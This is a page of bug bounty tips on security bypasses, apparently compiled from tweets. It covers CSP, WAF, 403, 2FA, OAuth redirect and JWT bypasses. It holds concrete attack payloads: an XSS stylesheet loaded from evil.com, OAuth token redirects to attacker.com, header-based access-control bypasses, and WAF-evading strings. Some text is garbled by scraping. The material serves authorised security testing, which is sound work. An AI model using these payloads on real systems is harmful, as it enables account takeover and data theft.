Book of BugBounty Tips
  • Introduction
  • OSINT / Recon
  • API
  • Cross Site Request Forgery (CSRF)
  • Server Side Request Forgery (SSRF)
  • Sensitive Information Disclosure
  • Cross Site Scripting (XSS)
  • CRLF
  • Remote Code Execution (RCE)
  • Email Bypass
  • File Upload
  • Open Redirect
  • Insecure Direct Object Reference (IDOR)
  • Injection
  • XXE
  • Local / Remote File Inclusion
  • Authentication / Authorization
  • Account Takeover
  • Application Login
  • Clickjacking
  • Parameter Pollution
  • Fuzzing
  • Application Logic Bypasses
  • Bypasses
  • Mobile
  • Password Reset
  • Web Cache
  • Server Side Template Injection
  • Tips from @EdOverflow
  • Tips From @intigriti
  • Hackpack From @yeswehack
  • Tips from @YogoshaOfficial
  • Tips from @Jhaddix
  • Tips from Ben (@nahamsec)
  • Tips from Other Sources
  • Tips from Blog posts / other hunters
  • Others
  • Bugbounty Related Websites / Blogs
  • Docker and k8s
  • Tweets Collection by @Pentesterland
  • Windows
  • Linux
  • Burp suite
  • Scope Based Recon Tips
Powered by GitBook
On this page

Bypasses

PreviousApplication Logic BypassesNextMobile

Last updated 1 month ago

  • CSP Bypass, script-src 'self' data: -

  • .

Cloudfront Bypass -

403 Bypass:

Tool -

  • Price Manipulation -

OTP bypass -

Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://*.foo.foo:* Check if is claimed.

CSP -

I just happened to be able to bypass a 2FA in place during a recent engagement. And this was how I did it. #bugbountyTips #pentestTips Last /setup/ endpoint was by attacker while the first one is as victim.
https://twitter.com/HackerHumble
sometimes you find those PATHs that forwards to a login page & you can't see the content inside them. (ex: /path/to/secret --> Google login)
http://foo.foo
https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/
#bugbountytip
https://github.com/lobuhi/byp4xx
h
ttps://github.com/Raywando/4xxbypass
https://github.com/sting8k/BurpSuite_403Bypasser
if “origin” header not work, try with “x-[org name]-origin”, same think for all headers!! e.g x-uber-origin, x-uber-host,..etc
#bugbounty I Was able to bypass the Filter on OAUTH through FUZZ With URL-Encode Chars , Found that Website Add / before %5b when redirect the token Example : target/oauth?redirect_uri=http://attacker.com%https://t.co/QSv7Vm2STd Redirect Token to : http://Attacker.com/%5b.target.comrget.com?token=…...
Had some recent success using untranslatable Unicode in place of a "?" when attacking URL parsers for SSRF/OAuth issues.
What worked was... \udfff -> � -> ?
Therefore... {"redirectUri":"https://attacker\udfff@[victim]/"}
Equals... Location: https://attacker?@[victim]/
JWT Token Bypasses #2:
Capture the JWT token.
If the algorithm is RS256 change to HS256 and sign the token with the public key (which you can get by visiting jwks Uri / mostly it will be the public key from the site's https certificate) (1/2)
Access control vulnerabilities with blocked access can be bypassed by adding the X-Original-URL header. POST /admin/deleteUser HTTP/1.1 -> 403 POST / HTTP/1.1 X-Original-URL: /admin/deleteUser -> 200OK Bypass Success! #bugbounty #bu
gbountytip
{“id”:111} --> 401 Unauthriozied {“id”:{“id”:111}} --> 200 OK
POST /api/get_profile Content-Type: application/json {“user_id”:,”user_id”:}
GET /api_v1/messages?user_id=VICTIM_ID --> 401
GET /api_v1/messages?user_id=attack&user_id=VICTIM --> 200 OK
How to find authentication bypass vulnerabilities. Focus. I Added headers.
Request GET /delete?user=test HTTP/1.1 Response HTTP/1.1 401 Unauthorized
Reqeust GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 302 Found
So: Site allows external '.css' stylesheets? Inject your XSS on your local 'style.css' an call it from external "<svg><link href=//evil.com/style.css>" XSS will be injected in the html! (CSP it's on? but no style-src?) so hit the box dude! #bugbounty #infosec
CSP - Hates CSP? Me too I found HTML Injection in Bugcrowd Private (can't trigger script because of CSP). Staff change state to P5 (Content Spoofing).
But I can raise it again to P3 (Iframe Injection) and Triaged.
<iframe src= blocked by CSP
Solution:
<iframe srcdoc=
Auth bypass tip:
/api/ -> 403 Fuzzing -> not working Try: /api/application.wadl?detail=true
Found:
/api/etc/projects/{id} /api/etc/users/{id} /api/etc/admin/ Impact:[ + ] PII Info disclosure [ + ] Sensitive info leak [ + ] Access admin endpoint #bugbantytips #bugbountytips
1. Found a subdomain with 404 error 2. Added /api ==> 401 error 3. Using FFUF find /api/v2/users endpoint. But still forbidden. 4. Bypass api protection using / ===> //api/v2/users Boom!! PII of internal user disclosure. #bugbounty #cybersecurity #infosec #bugbountytips
It's possible to bypass #CSP with the following : #JSONP: <script src="https://trustedsite/jsonp?callback=payload"> #AngularJS <script src="https://trustedsite/angularjs/1.1.3/angularjs.min.js"> <div ng-app ng-csp id=p ng-click=$event.view.alert(1)>
Encountered with AWS WAF? Just add "<!" (without quotes) before your payload and bypass that WAF. :) eg: <!alert(1) #BugBounty #bugbountytip #bugbountytips
If the target is using @Cloudflare , dig in their DNS records and search for the origins IP address. If you attack the application directly by his IP’s cloudflare WAF will not be there.
Here is my obfuscated payload. It bypasses lots of WAF, including CloudFlare iirc. iFrame with javascript URI payload. Line feeds [CRLF] obfuscate it.
Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://*.foo.foo:* Check if http://foo.foo is claimed. https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/ … #bugbountytip
Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: admin role ID is 1 Try to set your ID to 0.9 and it may bypass the auth check as system will round up after auth check #bugbountytip #bugbounty
When hacking webapps, I have a little bag of bugs I always check for that are commonly missed. Here's one: I check if signing up with the same username as a deleted account will give me access to their old data.
https://twitter.com/404death/status/1191222237782659072
Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter
https://twitter.com/RathiArpeet/status/1315593774773334016
https://twitter.com/hackerscrolls/status/1254701239360720900
https://twitter.com/SalahHasoneh1/status/1284869760921014274?s=20
https://twitter.com/iam_j0ker/status/1303658167205728256?s=20